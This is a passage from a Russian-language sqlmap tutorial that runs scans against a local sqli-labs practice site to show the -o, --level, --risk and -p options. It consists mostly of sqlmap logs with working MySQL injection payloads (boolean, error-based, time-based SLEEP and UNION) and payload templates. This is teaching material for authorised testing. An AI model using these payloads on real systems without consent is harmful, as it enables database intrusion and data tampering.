[17:52:05] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[17:52:05] [INFO] testing 'MySQL inline queries'
[17:52:05] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[17:52:05] [WARNING] time-based comparison requires larger statistical model, please wait........ (done)
[17:52:05] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[17:52:05] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
[17:52:05] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
[17:52:05] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[17:52:05] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[17:52:05] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[17:52:15] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[17:52:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[17:52:15] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[17:52:15] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[17:52:15] [INFO] target URL appears to have 3 columns in query
[17:52:15] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 5685=5685 AND 'zDwo'='zDwo
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 3544 FROM(SELECT COUNT(*),CONCAT(0x7176626a71,(SELECT (ELT(3544=3544,1))),0x7176787671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'HmJC'='HmJC
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 2801 FROM (SELECT(SLEEP(5)))aNGQ) AND 'JWiB'='JWiB
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-7025' UNION ALL SELECT NULL,CONCAT(0x7176626a71,0x6355614c635050625177414166564173496f6c6558686978795257636b647a4b465a634b4a724275,0x7176787671),NULL-- ImLs
---
[17:52:17] [INFO] the back-end DBMS is MySQL
[17:52:17] [INFO] fetching banner
web application technology: PHP 7.3.4, Apache 2.4.39
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[17:52:17] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.0.103'
[17:52:17] [WARNING] you haven't updated sqlmap for more than 210 days!!!
[*] ending @ 17:52:17 /2020-02-29/
4. Оптимизация в один клик
параметр:
-o
Добавление этого параметра эквивалентно добавлению следующих трех параметров оптимизации одновременно:
--keep-alive--null-connection--threads=3
провести тестирование:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 -o --banner
Распечатать
___
__H__
___ ___[(]_____ ___ ___ {1.4.2.31#dev}
|_ -| . ['] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 18:10:58 /2020-02-29/
[18:10:59] [INFO] testing connection to the target URL
[18:10:59] [INFO] checking if the target is protected by some kind of WAF/IPS
[18:10:59] [INFO] testing NULL connection to the target URL
[18:10:59] [INFO] testing if the target URL content is stable
[18:10:59] [INFO] target URL content is stable
[18:10:59] [INFO] testing if GET parameter 'id' is dynamic
[18:10:59] [INFO] GET parameter 'id' appears to be dynamic
[18:10:59] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[18:10:59] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[18:10:59] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[18:11:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:11:01] [WARNING] reflective value(s) found and filtering out
[18:11:01] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[18:11:01] [INFO] testing 'Generic inline queries'
[18:11:01] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[18:11:01] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[18:11:01] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[18:11:01] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[18:11:01] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[18:11:01] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[18:11:01] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[18:11:01] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[18:11:01] [INFO] testing 'MySQL inline queries'
[18:11:01] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[18:11:01] [WARNING] time-based comparison requires larger statistical model, please wait....... (done)
[18:11:02] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[18:11:02] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[18:11:02] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[18:11:02] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[18:11:02] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[18:11:02] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[18:11:12] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[18:11:12] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[18:11:12] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[18:11:12] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[18:11:12] [INFO] target URL appears to have 3 columns in query
[18:11:12] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 51 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 7309=7309 AND 'GVyE'='GVyE
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 5612 FROM(SELECT COUNT(*),CONCAT(0x716b627671,(SELECT (ELT(5612=5612,1))),0x71787a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'JtLU'='JtLU
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 9807 FROM (SELECT(SLEEP(5)))hQew) AND 'RiIn'='RiIn
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-5240' UNION ALL SELECT NULL,CONCAT(0x716b627671,0x634b55616c6f7158454649744769636d6469434650587346464c714e63504972694e646d44696d76,0x71787a6271),NULL-- -
---
[18:11:18] [INFO] the back-end DBMS is MySQL
[18:11:18] [INFO] fetching banner
[18:11:18] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[18:11:18] [INFO] fetched data logged to text files under 'xxxxsqlmapoutput127.0.0.1'
[*] ending @ 18:11:18 /2020-02-29/
При необходимости вы можете перейти в каталог, чтобы удалить кеш, а затем протестировать, эффект будет более очевидным.
Два, настраиваемые параметры обнаружения sqlmap
Просмотреть справку sqlmap:
python sqlmap.py -hh
Выберите некоторые из результатов:
Detection:
These options can be used to customize the detection phase
--level=LEVEL Level of tests to perform (1-5, default 1)
--risk=RISK Risk of tests to perform (1-3, default 1)
--string=STRING String to match when query is evaluated to True
--not-string=NOT.. String to match when query is evaluated to False
--regexp=REGEXP Regexp to match when query is evaluated to True
--code=CODE HTTP code to match when query is evaluated to True
--smart Perform thorough tests only if positive heuristic(s)
--text-only Compare pages based only on the textual content
--titles Compare pages based only on their titles
Включите два параметра –level и –risk.
1. sqlmap устанавливает уровень обнаружения
параметр:
--level
Этот параметр используется для указания уровня обнаружения, есть 5 уровней от 1 до 5;
По умолчанию 1, что означает наименьшее обнаружение, соответственно, уровень 5 означает наибольшее обнаружение.
обнаруживает запросы получения и публикации, когда уровень равен 1;
обнаруживает файлы cookie, когда уровень равен 2;
Обнаружение агента пользователя и реферера на уровне 3;
Чем выше уровень, тем больше контента будет обнаружено.
В частности, вы можете проверить каталог sqlmapdataxmlpayloads(Каталог старой версии sqlmap может не совпадать, это может быть xml payloads), содержимое выглядит следующим образом:
<test>
<title>AND boolean-based blind - WHERE or HAVING clause</title>
<stype>1</stype>
<level>1</level>
<risk>1</risk>
<clause>1,8,9</clause>
<where>1</where>
<vector>AND [INFERENCE]</vector>
<request>
<payload>AND [RANDNUM]=[RANDNUM]</payload>
</request>
<response>
<comparison>AND [RANDNUM]=[RANDNUM1]</comparison>
</response>
</test>
<test>
<title>OR boolean-based blind - WHERE or HAVING clause</title>
<stype>1</stype>
<level>1</level>
<risk>3</risk>
<clause>1,9</clause>
<where>2</where>
<vector>OR [INFERENCE]</vector>
<request>
<payload>OR [RANDNUM]=[RANDNUM]</payload>
</request>
<response>
<comparison>OR [RANDNUM]=[RANDNUM1]</comparison>
</response>
</test>
<test>
<title>OR boolean-based blind - WHERE or HAVING clause (NOT)</title>
<stype>1</stype>
<level>3</level>
<risk>3</risk>
<clause>1,9</clause>
<where>1</where>
<vector>OR NOT [INFERENCE]</vector>
<request>
<payload>OR NOT [RANDNUM]=[RANDNUM]</payload>
</request>
<response>
<comparison>OR NOT [RANDNUM]=[RANDNUM1]</comparison>
</response>
</test>
Пример теста:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --banner --level 2 -v 5
Распечатать
___
__H__
___ ___[.]_____ ___ ___ {1.4.2.31#dev}
|_ -| . ["] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 18:29:07 /2020-02-29/
[18:29:07] [DEBUG] cleaning up configuration parameters
[18:29:07] [DEBUG] setting the HTTP timeout
[18:29:07] [DEBUG] setting the HTTP User-Agent header
[18:29:07] [DEBUG] creating HTTP requests opener object
[18:29:08] [INFO] resuming back-end DBMS 'mysql'
[18:29:08] [INFO] testing connection to the target URL
[18:29:08] [TRAFFIC OUT] HTTP request [#1]:
GET /sqli-labs/Less-1/?id=1--banner HTTP/1.1
Cache-control: no-cache
User-agent: sqlmap/1.4.2.31#dev (http://sqlmap.org)
Host: 127.0.0.1
Accept: */*
Accept-encoding: gzip,deflate
Connection: close
[18:29:08] [DEBUG] declared web page charset 'utf-8'
[18:29:08] [TRAFFIC IN] HTTP response [#1] (200 OK):
Date: Sat, 29 Feb 2020 10:29:08 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a
X-Powered-By: PHP/7.3.4
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
URI: http://127.0.0.1:80/sqli-labs/Less-1/?id=1--banner
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 7309=7309 AND 'GVyE'='GVyE
Vector: AND [INFERENCE]
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 5612 FROM(SELECT COUNT(*),CONCAT(0x716b627671,(SELECT (ELT(5612=5612,1))),0x71787a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'JtLU'='JtLU
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 9807 FROM (SELECT(SLEEP(5)))hQew) AND 'RiIn'='RiIn
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-5240' UNION ALL SELECT NULL,CONCAT(0x716b627671,0x634b55616c6f7158454649744769636d6469434650587346464c714e63504972694e646d44696d76,0x71787a6271),NULL-- -
Vector: UNION ALL SELECT NULL,[QUERY],NULL-- -
---
[18:29:08] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[18:29:08] [INFO] fetched data logged to text files under 'xxxxsqlmapoutput127.0.0.1'
[*] ending @ 18:29:08 /2020-02-29/
2. sqlmap устанавливает уровень риска
параметр:
--risk
Этот параметр используется для указания уровня риска, есть 3 уровня от 1 до 3;
Уровень риска по умолчанию равен 1, что в большинстве случаев безвредно для тестовой цели;
Уровень риска 2 добавляет тест инъекции на основе времени, а уровень 3 добавляет тест ИЛИ.
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1--banner --risk 2 -v 5
Распечатать
___
__H__
___ ___[(]_____ ___ ___ {1.4.2.31#dev}
|_ -| . [(] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all appli
cable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 18:33:59 /2020-02-29/
[18:33:59] [DEBUG] cleaning up configuration parameters
[18:34:00] [DEBUG] setting the HTTP timeout
[18:34:00] [DEBUG] setting the HTTP User-Agent header
[18:34:00] [DEBUG] creating HTTP requests opener object
[18:34:00] [INFO] resuming back-end DBMS 'mysql'
[18:34:00] [INFO] testing connection to the target URL
[18:34:00] [TRAFFIC OUT] HTTP request [#1]:
GET /sqli-labs/Less-1/?id=1 HTTP/1.1
Cache-control: no-cache
User-agent: sqlmap/1.4.2.31#dev (http://sqlmap.org)
Host: 127.0.0.1
Accept: */*
Accept-encoding: gzip,deflate
Connection: close
[18:34:00] [DEBUG] declared web page charset 'utf-8'
[18:34:00] [TRAFFIC IN] HTTP response [#1] (200 OK):
Date: Sat, 29 Feb 2020 10:34:00 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a
X-Powered-By: PHP/7.3.4
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
URI: http://127.0.0.1:80/sqli-labs/Less-1/?id=1
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 7309=7309 AND 'GVyE'='GVyE
Vector: AND [INFERENCE]
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 5612 FROM(SELECT COUNT(*),CONCAT(0x716b627671,(SELECT (ELT(5612=5612,1))),0x71787a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_
SCHEMA.PLUGINS GROUP BY x)a) AND 'JtLU'='JtLU
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.
PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 9807 FROM (SELECT(SLEEP(5)))hQew) AND 'RiIn'='RiIn
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-5240' UNION ALL SELECT NULL,CONCAT(0x716b627671,0x634b55616c6f7158454649744769636d6469434650587346464c714e63504972694e646d44696d76,0x7178
7a6271),NULL-- -
Vector: UNION ALL SELECT NULL,[QUERY],NULL-- -
---
[18:34:00] [INFO] the back-end DBMS is MySQL
[18:34:00] [INFO] fetching banner
[18:34:00] [DEBUG] resuming configuration option 'string' ('Your')
[18:34:00] [DEBUG] resuming configuration option 'optimize' (True)
[18:34:00] [DEBUG] turning off switch '--null-connection' used indirectly by switch '-o'
[18:34:00] [DEBUG] performed 0 queries in 0.00 seconds
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[18:34:00] [INFO] fetched data logged to text files under 'xxxxsqlmapoutput127.0.0.1'
[*] ending @ 18:34:00 /2020-02-29/
Когда уровень риска установлен на 3 и точка внедрения обновлена, данные в базе данных будут изменены.
Три, инъекция указанного местоположения sqlmap
1. в настройках sqlmap указываются параметры инъекции
По умолчанию Sqlmap проверяет все параметры GET и POST. Когда уровень больше или равен 2, он проверяет параметры cookie, а когда уровень больше или равен 3, он проверяет User-Agent и Referer.
Фактически, вы также можете вручную указать список параметров, разделенных запятыми, для тестирования. Параметры в этом списке не ограничены уровнем. Это-pРоль.
Если вы не хотите тестировать параметр, вы можете использовать--skip。
-p параметр test:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 -p "id,user-agent" --banner
Распечатать
___
__H__
___ ___["]_____ ___ ___ {1.4.2.31#dev}
|_ -| . [(] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 19:46:17 /2020-02-29/
[19:46:17] [INFO] testing connection to the target URL
[19:46:17] [INFO] checking if the target is protected by some kind of WAF/IPS
[19:46:17] [INFO] testing if the target URL content is stable
[19:46:17] [INFO] target URL content is stable
[19:46:18] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[19:46:18] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[19:46:18] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[19:46:20] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:46:20] [WARNING] reflective value(s) found and filtering out
[19:46:20] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[19:46:20] [INFO] testing 'Generic inline queries'
[19:46:20] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[19:46:20] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[19:46:20] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[19:46:20] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[19:46:20] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[19:46:20] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[19:46:20] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[19:46:20] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[19:46:20] [INFO] testing 'MySQL inline queries'
[19:46:20] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[19:46:20] [WARNING] time-based comparison requires larger statistical model, please wait........ (done)
[19:46:20] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[19:46:20] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[19:46:20] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[19:46:21] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[19:46:21] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[19:46:21] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[19:46:31] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[19:46:31] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[19:46:31] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[19:46:31] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[19:46:31] [INFO] target URL appears to have 3 columns in query
[19:46:31] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 52 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 3986=3986 AND 'enRu'='enRu
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 1856 FROM(SELECT COUNT(*),CONCAT(0x716a6b7871,(SELECT (ELT(1856=1856,1))),0x7176627171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'lead'='lead
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 1215 FROM (SELECT(SLEEP(5)))pAXX) AND 'hFkU'='hFkU
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-7916' UNION ALL SELECT NULL,CONCAT(0x716a6b7871,0x5555746d5964564d754675746c4543626c4f556c4f79716874665470654872514878594c714b4b42,0x7176627171),NULL-- -
---
[19:46:36] [INFO] the back-end DBMS is MySQL
[19:46:36] [INFO] fetching banner
[19:46:37] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[19:46:37] [INFO] fetched data logged to text files under 'xxxxsqlmapoutput127.0.0.1'
[*] ending @ 19:46:37 /2020-02-29/
Добавьте параметры и снова протестируйте:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1&us=1&uname=admin -p "id,uname" --banner
Распечатать
___
__H__
___ ___[(]_____ ___ ___ {1.4.2.31#dev}
|_ -| . ['] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 20:07:41 /2020-02-29/
[20:07:42] [INFO] testing connection to the target URL
[20:07:42] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:07:42] [INFO] testing if the target URL content is stable
[20:07:42] [INFO] target URL content is stable
[20:07:42] [INFO] testing if GET parameter 'id' is dynamic
[20:07:42] [INFO] GET parameter 'id' appears to be dynamic
[20:07:42] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[20:07:42] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[20:07:42] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[20:07:44] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:07:45] [WARNING] reflective value(s) found and filtering out
[20:07:45] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[20:07:45] [INFO] testing 'Generic inline queries'
[20:07:45] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[20:07:45] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[20:07:45] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[20:07:45] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[20:07:45] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[20:07:45] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[20:07:45] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:07:45] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[20:07:45] [INFO] testing 'MySQL inline queries'
[20:07:45] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[20:07:45] [WARNING] time-based comparison requires larger statistical model, please wait....... (done)
[20:07:45] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[20:07:45] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[20:07:45] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[20:07:45] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[20:07:45] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[20:07:45] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:07:55] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[20:07:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:07:55] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[20:07:55] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[20:07:55] [INFO] target URL appears to have 3 columns in query
[20:07:56] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 2973=2973 AND 'kWQV'='kWQV
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 4270 FROM(SELECT COUNT(*),CONCAT(0x716a766271,(SELECT (ELT(4270=4270,1))),0x716a6a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'rvTB'='rvTB
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 9758 FROM (SELECT(SLEEP(5)))Vtem) AND 'vzvR'='vzvR
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-4491' UNION ALL SELECT NULL,NULL,CONCAT(0x716a766271,0x7353566b685a767a4a68677574726d7662637477586e445172546473554f5872507a616670787677,0x716a6a6b71)-- -
---
[20:08:00] [INFO] the back-end DBMS is MySQL
[20:08:00] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
[20:08:00] [INFO] fetched data logged to text files under 'xxxxsqlmapoutput127.0.0.1'
[*] ending @ 20:08:00 /2020-02-29/
'us'Это не внутренняя или внешняя команда, ни исполняемая программа
Или командный файл.
uname: unknown option -- banner
Try 'uname --help' for more information.
-Пропустить проверку параметров:
